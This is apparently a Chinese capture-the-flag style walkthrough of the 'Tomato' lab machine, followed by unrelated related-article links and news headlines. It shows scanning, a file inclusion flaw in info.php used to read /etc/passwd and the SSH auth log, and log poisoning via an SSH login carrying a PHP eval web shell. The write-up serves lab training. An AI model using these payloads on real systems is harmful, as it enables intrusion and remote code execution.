当前位置: 首页 > news >正文

Tomato靶机攻略

news 来源:原创 2025/5/16 21:10:01

将tomato改为NAT模式

扫描ip

arp-scan -l

 扫描端口,发现ssh服务端口从22改为2211

扫描目录 

 

 发现http://192.168.31.134/antibot_image/  访问

 查看所有php文件的源码,看看有什么不同的地方

在info.php的源码中发现问题

 在输入后,成功显示,说明文件包含漏洞

info.php?image=/etc/passwd

 

 通过/var/log/auth.log这个在linux中使用的日志文件,成功查看到日志

 info.php?image=/var/log/auth.log

 

 使用ssh登录,看日志里会不会出现记录

 发现日志中有记录

 使用kali,让一句话木马写入日志中

ssh '<?php @eval($_POST[1]);?>'@192.168.31.134 -p 2211,

我的kali写入失败,选择用xshell连接

 

之后点击连接,当然肯定会失败,日志记录了就可以

使用中国蚁剑连接

相关文章:

  • Redis超高并发分key实现
  • HDR图像处理:色调映射和色域映射参数
  • 记一次OOM异常问题排查
  • 感觉自己邮电部诗人
  • electron + vue3 + vite 渲染进程与渲染进程之间的消息端口通信
  • 用nodejs加electron加roboticjs判断鼠标点击时是否在浏览器内部
  • 1.VisionPro的安装
  • 植物学(botany)这个单词怎么记?牛吃草,草是一种植物
  • BLDC直流无刷电机转速电流双闭环调速MATLAB仿真
  • PyTorch分布式训练
  • 基于 Selenium 的软件测试方法研究
  • Java 大视界 -- Java 大数据中的数据可视化大屏设计与开发实战(127)
  • Oracle VirtualBox安装CentOS 7
  • STM32使用EXTI触发进行软件消抖(更新中)
  • CDefView::_GetPIDL函数分析之ListView_GetItem函数的参数item的item.mask 为LVIF_PARAM
  • Linux_17进程控制
  • 某快餐店用户市场数据挖掘与可视化
  • 强大的数据库DevOps工具:NineData 社区版
  • 使用Dockerfile构建一个Docker镜像
  • 达梦数据库-学习-10-SQL 注入 HINT 规则(固定执行计划)
  • 远洋集团:今年前4个月销售80.9亿元,同比增加13.62%
  • 蚊媒传染病、手足口病……上海疾控发布近期防病提示
  • 中国-拉共体论坛第四届部长级会议北京宣言
  • 习近平同巴西总统卢拉共同会见记者
  • 三亚通报救护车省外拉警报器开道旅游:违规违法,责令公司停业整顿
  • 某博主遭勒索后自杀系自导自演,成都警方立案调查